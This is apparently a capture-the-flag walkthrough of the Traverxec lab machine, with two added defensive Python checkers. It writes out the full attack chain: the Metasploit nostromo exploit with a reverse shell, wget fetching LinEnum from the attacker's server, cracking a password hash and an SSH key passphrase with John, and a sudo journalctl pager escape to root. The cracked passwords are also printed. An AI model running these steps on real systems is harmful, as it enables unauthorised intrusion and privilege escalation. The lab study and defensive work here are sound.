Traverxec is an easy-difficulty Linux machine that is a good introduction to web-to-host exploitation as well as SSH usage.
Recon
We start off by scanning Traverxec's IP, 10.10.10.165, with nmap:
nmap -T4 -A -v 10.10.10.165
From the results we get the following ports and services:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Right away we see that it is running only two services, and we have a likely web server name and version: nostromo 1.9.6.
We can use searchsploit to check whether there are any existing exploits for nostromo v1.9.6: searchsploit nostromo
We find that there is an RCE exploit for this version of nostromo.
Now let's fire up the Metasploit Framework with msfconsole and search for the exploit: search nostromo
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/nostromo_code_exec 2019-10-20 good Yes Nostromo Directory Traversal Remote Command Execution
msf has the exploit we want, so let's select and configure it.
Exploit
use exploit/multi/http/nostromo_code_exec
set LHOST tun0
set RHOST 10.10.10.165
set RPORT 80
run
After a few seconds we should get the following:
[*] Started reverse TCP handler on 10.10.15.64:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.15.64:4444 -> 10.10.10.165:59272) at 2020-04-11 02:34:42 -0700
Great, we have a shell! Unfortunately it is a limited shell, but we can upgrade it to a full PTY shell with python -c 'import pty; pty.spawn("/bin/bash")'
Next we need LinEnum.sh on the victim. On our machine we serve it with python -m SimpleHTTPServer, and on the victim we fetch it with wget http://IP:PORT/LinEnum.sh. Once we have it we set its permissions with chmod +x LinEnum.sh and run it with ./LinEnum.sh
Upon completion we find one line that stands out:
[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
We got a password hash! Back on our local machine, we put that hash into a file and run it through John:
touch hash
nano hash
john --wordlist=/root/Downloads/Dic/rockyou.txt hash
Nowonly4me (david)
Upon completion we get the password Nowonly4me.
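A defender's counterpart to this step, added here as an example that is not part of the original writeup: a small audit that parses an htpasswd file, flags entries using md5crypt and other fast hashes (the $1$ scheme found above), and checks whether the file is readable by the web server user, which is what let LinEnum find it. The entry other than david's is constructed, and treating only bcrypt as adequate is this example's assumption.

```python
import os, re, stat, tempfile

# Hash scheme by htpasswd prefix. md5crypt ($1$), the scheme found above, can be guessed
# offline at very high rates, which is why rockyou.txt recovered the password; only bcrypt
# is treated as adequate here (an assumption of this example, not a rule from the page).
SCHEMES = {"$2y$": "bcrypt", "$2a$": "bcrypt", "$2b$": "bcrypt",
           "$apr1$": "apache-md5", "$1$": "md5crypt", "{SHA}": "sha1"}
STRONG = {"bcrypt"}

def classify(hash_field):
    for prefix, name in SCHEMES.items():
        if hash_field.startswith(prefix):
            return name
    return "des-crypt" if len(hash_field) == 13 else "unknown"  # 13 chars: classic crypt(3)

def audit_entries(text):
    """Return [(user, scheme, is_weak)] per entry; malformed lines count as weak."""
    out = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.fullmatch(r"([^:\s]+):(\S+)", line)
        if not m:
            out.append((line, "malformed", True))
            continue
        user, digest = m.groups()
        scheme = classify(digest)
        out.append((user, scheme, scheme not in STRONG))
    return out

def world_readable(path):
    """True if group or others can read the file, i.e. the web user could dump it."""
    return bool(os.stat(path).st_mode & (stat.S_IRGRP | stat.S_IROTH))

def demo_mode():
    """Temp file checked at mode 0644 and then 0600; returns (before, after)."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    os.chmod(path, 0o644)
    before = world_readable(path)
    os.chmod(path, 0o600)
    after = world_readable(path)
    os.unlink(path)
    return before, after

# Constructed sample: the line LinEnum reported above plus one made-up bcrypt entry.
SAMPLE = """\
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
alice:$2y$10$abcdefghijklmnopqrstuuABCDEFGHIJKLMNOPQRSTUVWXYZ0123456
"""
```

Fixing the finding means both rehashing with bcrypt (htpasswd -B) and restricting the file to the web server's user with mode 0600.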
We also see that /home/david/public_www contains a folder protected-file-area which is protected by .htaccess. Checking the nostromo documentation (http://www.nazgul.ch/dev/nostromo_man.html) we see that there is yet another directory we can access, ~david. Trying to access this directory gives us the following page:
Doesn't look very interesting, does it? Well, typing the URL 10.10.10.165/~david/protected-file-area into the browser gives us an auth prompt, and we already have the credentials for it: david:Nowonly4me. It takes us to an index page where we can download backup-ssh-identity-files.tgz.
Once downloaded, we extract the SSH keys; it gives us the following files:
Unfortunately the id_rsa is encrypted, but luckily we can pass it through John:
python /usr/share/john/ssh2john.py ~/HTB/Traverexec/home/david/.ssh/id_rsa > ~/HTB/Traverexec/ssh.txt
john ssh.txt --wordlist=~/Downloads/Dic/rockyou.txt
hunter (/root/HTB/Traverexec/home/david/.ssh/id_rsa)
Great, we got the passphrase hunter! We can now use this with id_rsa to connect via SSH:
ssh -i id_rsa david@10.10.10.165
And with that we have user!
Post Exploitation
Checking the bin directory in David's home we find:
david@traverxec:~/bin$ ls -ahlrs
total 16K
4.0K -rwx------ 1 david david 363 Oct 25 16:26 server-stats.sh
4.0K -r-------- 1 david david 802 Oct 25 16:26 server-stats.head
4.0K drwx--x--x 5 david david 4.0K Oct 25 17:02 ..
4.0K drwx------ 2 david david 4.0K Oct 25 16:26 .
server-stats.head gives us a banner, not much use; however, checking server-stats.sh we get the following:
The last line, /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat, shows that journalctl is run as root via sudo, so can we exploit this?
Yes we can! Checking GTFOBins (https://gtfobins.github.io/gtfobins/journalctl/) we find that simply typing !/bin/sh from within journalctl's pager can give us root access. We run /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
Apr 24 01:05:26 traverxec sudo[807]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 24 01:05:26 traverxec sudo[807]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): conversation failed
Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 24 01:48:40 traverxec sudo[1574]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
!/bin/sh
root@traverexec:/home/david/bin# cd /root/
root@traverexec:~# cat root.txt
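From the defender's side, added here as an example that is not part of the original writeup: a checker for the root cause of this privilege escalation, a sudo rule or script that runs a paging command such as journalctl without --no-pager, with a helper that inserts the flag. The sudoers line in the sample is a constructed assumption (the box's real sudoers file is not shown above); only journalctl and systemctl are checked.

```python
import os
import re
import shlex

# Commands whose output goes through $PAGER (less by default). Run under sudo
# without --no-pager, the pager's "!" escape gives a root shell, which is the
# GTFOBins journalctl trick used above. The set is illustrative, not exhaustive.
PAGING_COMMANDS = {"journalctl", "systemctl"}

def _sudo_commands(line):
    """Yield the argv (after sudo) of every sudo-run command on a shell or sudoers line."""
    line = line.split("#", 1)[0]
    if re.match(r"^\s*\S+\s+\S+=", line):       # heuristic: a sudoers rule
        # command list follows the last ':' (assumes a tag such as NOPASSWD: is present)
        parts = ["sudo " + c.strip() for c in line.split(":")[-1].split(",")]
    else:                                        # shell: look at each pipeline stage
        parts = line.split("|")
    for part in parts:
        try:
            argv = shlex.split(part)
        except ValueError:                       # unbalanced quotes: skip the stage
            continue
        if argv and os.path.basename(argv[0]) == "sudo":
            yield argv[1:]                       # assumes sudo is given no options of its own

def pager_escape_risks(text):
    """Return [(lineno, command)] for sudo-run paging commands that lack --no-pager.
    A trailing '| cat' in a script does not help: sudoers still permits the bare command."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        for argv in _sudo_commands(raw):
            if argv and os.path.basename(argv[0]) in PAGING_COMMANDS and "--no-pager" not in argv:
                findings.append((lineno, os.path.basename(argv[0])))
    return findings

def harden(line):
    """Insert --no-pager directly after the paging command, if it is not already there."""
    if "--no-pager" in line:
        return line
    return re.sub(r"\b(journalctl|systemctl)\b", r"\1 --no-pager", line, count=1)

# Constructed sample: the server-stats.sh line quoted above, a plausible sudoers
# rule granting it (an assumption; the box's real sudoers is not on the page),
# a hardened variant, and an unrelated paging command.
SAMPLE = """\
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
david ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service
sudo systemctl status nostromo.service
"""
```

Lines 1, 2 and 4 of the sample are reported; line 3 shows the fix, which must be applied in sudoers itself, since the script's pipe to cat does not constrain what the sudo rule allows.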